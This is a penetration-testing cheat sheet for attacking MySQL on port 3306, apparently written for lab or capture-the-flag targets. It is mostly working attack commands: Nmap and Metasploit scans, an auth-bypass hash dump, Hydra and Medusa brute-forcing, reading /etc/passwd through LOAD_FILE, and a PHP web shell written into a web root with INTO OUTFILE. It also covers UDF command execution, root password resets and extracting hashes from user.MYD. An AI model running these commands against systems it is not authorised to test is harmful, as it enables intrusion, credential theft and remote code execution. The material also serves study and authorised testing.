MySQL ( 3306 )

Resources

• Core Concepts & Exploitation
  • By vultr: https://docs.vultr.com/how-to-install-mysql-on-ubuntu-24-04
  • By hackingarticles: https://www.hackingarticles.in/penetration-testing-on-mysql-port-3306/
  • By redfoxsec: https://redfoxsec.com/blog/exploiting-mysql-service/
  • By russiansecurity: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/
  • By seebug: https://paper.seebug.org/1113/
  • By scworld: https://www.scworld.com/sw-article/mysql-file-system-enumeration-updated
• User Defined Functions (UDF) Exploitation
  • By juggernaut-sec: http://juggernaut-sec.com/mysql-user-defined-functions/
  • By r3d-buck3t: https://medium.com/r3d-buck3t/privilege-escalation-with-mysql-user-defined-functions-996ef7d5ceaf
• Configuration
  • Official Docs: https://dev.mysql.com/doc/refman/8.0/en/server-system-variables.html

Cheat sheet

• By secybr: https://secybr.com/posts/mysql-pentesting-best-practices/
• By snovvcra: https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mysql-mariadb

Commands

• Network Scans
  • Nmap Version Scan

    nmap -sV -p 3306 10.129.33.112

  • Metasploit Version Scan

    use auxiliary/scanner/mysql/mysql_version

• Vulnerability Scans
  • Check for old auth bypass vulnerability (Metasploit)

    use auxiliary/scanner/mysql/mysql_authbypass_hashdump

    Affects MySQL before 5.1.63, 5.5.24, 5.6.6 and MariaDB before 5.1.62, 5.2.12, 5.3.6, 5.5.23

• Connecting with mysql client
  • Connect as root locally (no password)

    mysql -u root

  • Connect as root locally (with password prompt)

    mysql -u root -p

  • Connect to a remote host with credentials

    mysql -h 10.129.33.112 -u robin -probin

  • Connect and execute a single command

    mysql -h 10.129.29.249 -u robin -probin -e 'show databases;'

• Brute-Force Tools
  • Hydra

    hydra -L x.txt -P x.txt 10.129.29.249 mysql

  • Medusa

    medusa -h 10.129.29.249 -U x.txt -P x.txt -f -M mysql

  • Metasploit

    use auxiliary/scanner/mysql/mysql_login

• Initial Enumeration
  • Get system and database information.

    select version();
    select user();
    select database();
    show databases;
    use customers;
    show tables;
    describe myTable;

• Privilege & Configuration Auditing
  • Check the current user’s privileges.

    show grants for current_user();
    select user,file_priv from mysql.user where user='robin';

    Look for the FILE privilege. If it’s there, you should be able to read/write files.

  • Check the secure_file_priv variable, which controls file I/O.

    show variables like 'secure_file_priv';

    Understanding secure_file_priv

    • Empty/Blank: You can read/write files anywhere on the server that the MySQL process has permissions to. (Very dangerous)
    • A Path (e.g., /var/lib/mysql-files/): You are restricted to reading/writing files only within that specific folder. (More secure)
    • NULL: File I/O with LOAD_FILE() and INTO OUTFILE is completely disabled. (Most secure)

• File I/O Exploitation
  • Write a test file to a permitted directory.

    SELECT 'hello_from_mysql' INTO OUTFILE '/var/lib/mysql-files/test.txt';

  • Write a web shell to a web root directory.

    select "<?php echo shell_exec($_GET['c']);?>" into OUTFILE 'C:/xampp/htdocs/back.php';

  • Read a file from the server.

    SELECT LOAD_FILE('/var/lib/mysql-files/test.txt');
    select load_file('/etc/passwd');

  • Read a file using LOAD DATA.

    LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n';

• Advanced Commands & RCE
  • Execute OS commands via UDF (if a vulnerable function like do_system exists).

    select do_system('id');

  • Spawn a local shell from the client (does not execute on the server).

    \! sh

  • Change a user’s password (requires high privileges).

    UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
    FLUSH PRIVILEGES;

• Metasploit Post-Exploitation (with Credentials)
  • Enumerate privileges, hashes, and databases.

    use auxiliary/admin/mysql/mysql_enum

  • Dump the database schema.

    use auxiliary/scanner/mysql/mysql_schemadump

  • Dump user password hashes.

    use auxiliary/scanner/mysql/mysql_hashdump

  • Achieve RCE via startup parameters (Windows).

    use exploit/windows/mysql/mysql_start_up

• Dumping Hashes from MySQL Files (on the host)

  grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Notes

Configuration Files

MySQL configuration is stored in a my.cnf (Linux) or my.ini (Windows) file. Common locations include: Unix/Linux:

• /etc/my.cnf
• /etc/mysql/my.cnf
• /var/lib/mysql/my.cnf
• ~/.my.cnf Windows:
• my.ini
• windows\my.ini
• winnt\my.ini

Useful Files & Locations

• Data Directory: /var/lib/mysql/ or /mysql/data/
• Command History: ~/.mysql.history
• Log Files: connections.log, update.log, common.log

UDF Exploit Architecture

The popular UDF dynamic library exploits generally work on MySQL/MariaDB versions 4.x and 5.x. The architecture of the exploit library (32-bit vs 64-bit) must match the architecture of the target MySQL server.

MySQL Architecture